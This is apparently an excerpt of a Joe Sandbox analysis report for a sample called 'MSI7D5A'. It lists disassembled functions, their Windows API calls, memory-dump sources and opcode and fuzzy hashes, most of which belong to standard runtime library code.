                                                      • Instruction ID: 18db9fa5c1a43cf2e0c43b20157e83ed114c6934553050fce5514e7ad701f94e
                                                      • Opcode Fuzzy Hash: ea206febe7643b15d5fd9e62af2276312b7d8137675f1b06f4cef50830795162
                                                      • Instruction Fuzzy Hash: 88218E32B00204AADB34DF54CE04A9B77ABAB7CB64B56C5E8E90EDB110EB32DD41C750
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A49CC0 Relevance: 7.9, APIs: 5, Instructions: 441COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: _swprintf$FreeLocal
                                                      • String ID:
                                                      • API String ID: 2429749586-0
                                                      • Opcode ID: 5bd980dce014c01ea22c1c978b5883afeef68e77bfc91e5d90051c62c5fa3db6
                                                      • Instruction ID: cb6773300f19da327df36b7779f91021e934b1ee93baaaab6e20876fc77eec20
                                                      • Opcode Fuzzy Hash: 5bd980dce014c01ea22c1c978b5883afeef68e77bfc91e5d90051c62c5fa3db6
                                                      • Instruction Fuzzy Hash: EDF1BB75E00219ABDF15DFA8DC41BAFBBB5FF88300F144229F801AB281D735A951CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A7E788 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A757CC: GetLastError.KERNEL32(?,00000008,00A7AD4C), ref: 00A757D0
                                                        • Part of subcall function 00A757CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00A75872
                                                      • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00A7E894
                                                      • IsValidCodePage.KERNEL32(00000000), ref: 00A7E8DD
                                                      • IsValidLocale.KERNEL32(?,00000001), ref: 00A7E8EC
                                                      • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00A7E934
                                                      • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00A7E953
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                      • String ID:
                                                      • API String ID: 415426439-0
                                                      • Opcode ID: 033e8adb8ddf89e4e53a340b18b0e6e68f8c7e06c2dbe39b232172f17124606a
                                                      • Instruction ID: e6a8632cea06fb3772e7c5deba66591b71ad5578ed08ba0a6c952780a387fd95
                                                      • Opcode Fuzzy Hash: 033e8adb8ddf89e4e53a340b18b0e6e68f8c7e06c2dbe39b232172f17124606a
                                                      • Instruction Fuzzy Hash: 56515F72A00215AFEB20DFA5DD45ABF73B8BF5C700F14C5A9E918EB191E770D9018B61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A75D6D Relevance: 6.3, APIs: 4, Instructions: 337COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: _strrchr
                                                      • String ID:
                                                      • API String ID: 3213747228-0
                                                      • Opcode ID: c088d6f79354faf8b1bce494a29b4de1bf964f76c3977490bbe1990304a04063
                                                      • Instruction ID: d7f1a761bab4ffa5b437588129f0f057ae88da31bc8d8bf4d33006a09a6cf77b
                                                      • Opcode Fuzzy Hash: c088d6f79354faf8b1bce494a29b4de1bf964f76c3977490bbe1990304a04063
                                                      • Instruction Fuzzy Hash: AAB12672E04A459FDB15CF78CC81BEEBBB5EF59300F15C16AE809AB241D2759D02CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A633A8 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00A633B4
                                                      • IsDebuggerPresent.KERNEL32 ref: 00A63480
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00A634A0
                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 00A634AA
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                      • String ID:
                                                      • API String ID: 254469556-0
                                                      • Opcode ID: d89273cddc8b92bd6cff72e970259bf79be2e6544bc8a5354364754f8d8ad27c
                                                      • Instruction ID: 38af8ecc05e4f03b0603bbd66eebb6769619d833e19aa3f6c8a7b556063bdac5
                                                      • Opcode Fuzzy Hash: d89273cddc8b92bd6cff72e970259bf79be2e6544bc8a5354364754f8d8ad27c
                                                      • Instruction Fuzzy Hash: ED3127B5D052189FDF11DFA4D989BCDBBB8AF08304F1041AAE50DAB250EB759B868F44
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A4D0A5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A4C630: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,838A949E,?,00A83D30,000000FF), ref: 00A4C657
                                                        • Part of subcall function 00A4C630: GetLastError.KERNEL32(?,00000000,00000000,838A949E,?,00A83D30,000000FF), ref: 00A4C661
                                                      • IsDebuggerPresent.KERNEL32(?,?,00A98AF0), ref: 00A4D0D8
                                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,00A98AF0), ref: 00A4D0E7
                                                      Strings
                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00A4D0E2
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                      • API String ID: 3511171328-631824599
                                                      • Opcode ID: 3bedfa2140ae58c8bf5908bb998d7305cdf80b00cd7ac95e967d3870ec93fc46
                                                      • Instruction ID: 1638aa064db5c71356f8b0718b359021c59a18a8f7553905f977db72a5b34384
                                                      • Opcode Fuzzy Hash: 3bedfa2140ae58c8bf5908bb998d7305cdf80b00cd7ac95e967d3870ec93fc46
                                                      • Instruction Fuzzy Hash: 68E092742047418FD370EF68E54874A7FE0AF90344F10895DE446C3650EBB4D4498BA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A7E237 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A757CC: GetLastError.KERNEL32(?,00000008,00A7AD4C), ref: 00A757D0
                                                        • Part of subcall function 00A757CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00A75872
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00A7E28B
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00A7E2D5
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00A7E39B
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: InfoLocale$ErrorLast
                                                      • String ID:
                                                      • API String ID: 661929714-0
                                                      • Opcode ID: 2f79f445af84d2ca25add3270469445e4e2faa51fea4d539960cd027e1e24d36
                                                      • Instruction ID: ab25c4da896d74db34ea42140c39508e24fd1b5fab9cab90e0d6afd1032cfbbb
                                                      • Opcode Fuzzy Hash: 2f79f445af84d2ca25add3270469445e4e2faa51fea4d539960cd027e1e24d36
                                                      • Instruction Fuzzy Hash: 65617F715102179BEB28DF28CD82BAA77B9FF08300F10C1BAE909CB595E775D985CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A66E1B Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00A66F13
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00A66F1D
                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00A66F2A
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                      • String ID:
                                                      • API String ID: 3906539128-0
                                                      • Opcode ID: 45ecc65c51845a529bd43c0e14e96991432900df334e056238b4370df074856a
                                                      • Instruction ID: e2a28f84f6b3ffae3235c4cecc5e2abe9c8ec5aa0b864948965d6974d0446f21
                                                      • Opcode Fuzzy Hash: 45ecc65c51845a529bd43c0e14e96991432900df334e056238b4370df074856a
                                                      • Instruction Fuzzy Hash: 0731A375901228ABCB21DF64D9897CDBBB8BF18310F5042EAE51CA72A1E7749F858F44
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A445B0 Relevance: 4.6, APIs: 3, Instructions: 64COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadResource.KERNEL32(00000000,00000000,838A949E,00000001,00000000,?,00000000,00A84460,000000FF,?,00A4474D,00A43778,?,00000000,00000000,?), ref: 00A445DB
                                                      • LockResource.KERNEL32(00000000,?,00000000,00A84460,000000FF,?,00A4474D,00A43778,?,00000000,00000000,?,?,?,?,00A43778), ref: 00A445E6
                                                      • SizeofResource.KERNEL32(00000000,00000000,?,00000000,00A84460,000000FF,?,00A4474D,00A43778,?,00000000,00000000,?,?,?), ref: 00A445F4
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: Resource$LoadLockSizeof
                                                      • String ID:
                                                      • API String ID: 2853612939-0
                                                      • Opcode ID: 614d04dd60831168391c58703a34ccd4e9704fe84813996c654944092166ec13
                                                      • Instruction ID: d78737ec7dc9b9c4cefd3b4f0e2f519197d5a7e21c052b5c97fdfc66beff6fd4
                                                      • Opcode Fuzzy Hash: 614d04dd60831168391c58703a34ccd4e9704fe84813996c654944092166ec13
                                                      • Instruction Fuzzy Hash: D111C636A046959BC735CF59DC44B6AF7FCE7CA725F11092AEC1AD3240EA359C008690
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A6E270 Relevance: 3.4, APIs: 2, Instructions: 449COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c3b8607f755f17a23646f2bf370a959f638319f8f7f89048cc653de111095432
                                                      • Instruction ID: b3cff35fec4ed313700e6567d0fd22db4c682762c9cfd26866d5dbe332da3913
                                                      • Opcode Fuzzy Hash: c3b8607f755f17a23646f2bf370a959f638319f8f7f89048cc653de111095432
                                                      • Instruction Fuzzy Hash: D5F14F75E002199FDF14CFA9C984AADB7B1FF98324F158269E815AB381D731AE05CF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A77B1F Relevance: 1.9, APIs: 1, Instructions: 408timeCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00A77F64,00000000,00000000,00000000), ref: 00A77E23
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: InformationTimeZone
                                                      • String ID:
                                                      • API String ID: 565725191-0
                                                      • Opcode ID: 2942d7baeb8e619a769d37fa604f4b3672018a04632cf67272e82ea668159824
                                                      • Instruction ID: 4d472822cb32624ef34251516b574faf0e6c4e472ed3550069e1e72bcfd6ea55
                                                      • Opcode Fuzzy Hash: 2942d7baeb8e619a769d37fa604f4b3672018a04632cf67272e82ea668159824
                                                      • Instruction Fuzzy Hash: C6C13B72E04215ABDB20EFA4DD02ABE77B9EF44750F15C056F909EB291E7309E41CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A784BD Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00A784B8,?,?,00000008,?,?,00A814E4,00000000), ref: 00A786EA
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: ExceptionRaise
                                                      • String ID:
                                                      • API String ID: 3997070919-0
                                                      • Opcode ID: 47b2bafacb6e252df5bb92428533e2039aec32c0e8ee3a254c4db01e7634c7e6
                                                      • Instruction ID: 18236acc1e7fce9ddf6a9269fdf30e88bebb433b62b78506dc49e0d22b438dbf
                                                      • Opcode Fuzzy Hash: 47b2bafacb6e252df5bb92428533e2039aec32c0e8ee3a254c4db01e7634c7e6
                                                      • Instruction Fuzzy Hash: D0B15B31650608DFD718CF28C88AB657BA0FF45364F25C658E99ECF2A1CB39E981CB40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A635A9 Relevance: 1.6, APIs: 1, Instructions: 144COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00A635BF
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: FeaturePresentProcessor
                                                      • String ID:
                                                      • API String ID: 2325560087-0
                                                      • Opcode ID: 8e67c476f9f907385f6470cdde7fd1400e8a5f7238f1b15e66f6c969d82f9886
                                                      • Instruction ID: 1a73ab571de6fd45da3aba12866d4fe85e26000a3213a6394040a6f9fbffed14
                                                      • Opcode Fuzzy Hash: 8e67c476f9f907385f6470cdde7fd1400e8a5f7238f1b15e66f6c969d82f9886
                                                      • Instruction Fuzzy Hash: 73519BB2A11605DFEB16CF99E8817AEBBF0FB48354F24852AC405EB350D7749A42CF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A7AF79 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f18edd2263d6237677bf8f55b2c4f358becb9ed7859a74e53a1e55ce24079f50
                                                      • Instruction ID: c48699ded833150faa3e013e77008dfbcfa778546a0c07590d1f005ec5bccc38
                                                      • Opcode Fuzzy Hash: f18edd2263d6237677bf8f55b2c4f358becb9ed7859a74e53a1e55ce24079f50
                                                      • Instruction Fuzzy Hash: 9431A6B2900219AFCB20DFA9CD89ABFB77DEB84350F14C159F91997244EA319D418B64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A6A587 Relevance: 1.6, Strings: 1, Instructions: 344COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0
                                                      • API String ID: 0-4108050209
                                                      • Opcode ID: bbf5afa6794cb6adee4ae3de000821c3e4eae1e410342beadca30223ef8dd994
                                                      • Instruction ID: 4b8cb919634827a54f1d5f994c9a191352bd0bb9dab54d2d0ad375aef6661d46
                                                      • Opcode Fuzzy Hash: bbf5afa6794cb6adee4ae3de000821c3e4eae1e410342beadca30223ef8dd994
                                                      • Instruction Fuzzy Hash: 36C1CD74A006468FCB28CF68C5906BEBBB2BF65310F284619D597EB291C731ED46CF52
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A7E48A Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A757CC: GetLastError.KERNEL32(?,00000008,00A7AD4C), ref: 00A757D0
                                                        • Part of subcall function 00A757CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00A75872
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00A7E4DE
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$InfoLocale
                                                      • String ID:
                                                      • API String ID: 3736152602-0
                                                      • Opcode ID: bbdaf4bf7e4e00bab641f753c05670ac64ffb98c2a88938c31c43cd8f47eadb6
                                                      • Instruction ID: f2c2e99c115cd44f67e6244c9989987fdfd1ae3c0c16e876b48e6900f2c896b7
                                                      • Opcode Fuzzy Hash: bbdaf4bf7e4e00bab641f753c05670ac64ffb98c2a88938c31c43cd8f47eadb6
                                                      • Instruction Fuzzy Hash: 9821807265420AABDB28DB25DD41ABA73ACEF49718F14C0BAF909C6151FB74ED008750
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A7E111 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A757CC: GetLastError.KERNEL32(?,00000008,00A7AD4C), ref: 00A757D0
                                                        • Part of subcall function 00A757CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00A75872
                                                      • EnumSystemLocalesW.KERNEL32(00A7E237,00000001,00000000,?,-00000050,?,00A7E868,00000000,?,?,?,00000055,?), ref: 00A7E183
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                      • String ID:
                                                      • API String ID: 2417226690-0
                                                      • Opcode ID: 5176bf12329f92232a8fdc06fd0d0d666c2f3f3e8184a54e60a4f03b2d2aae0c
                                                      • Instruction ID: 2b49c65f580805dd733f050f472ba23048c431bd6f7083458991bbeab973b307
                                                      • Opcode Fuzzy Hash: 5176bf12329f92232a8fdc06fd0d0d666c2f3f3e8184a54e60a4f03b2d2aae0c
                                                      • Instruction Fuzzy Hash: 6C11C63A2007019FDB18DF398C915BAB795FB88759B55C52CE54A47A40D771A942CB40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A7E6B9 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A757CC: GetLastError.KERNEL32(?,00000008,00A7AD4C), ref: 00A757D0
                                                        • Part of subcall function 00A757CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00A75872
                                                      • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00A7E453,00000000,00000000,?), ref: 00A7E6E5
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
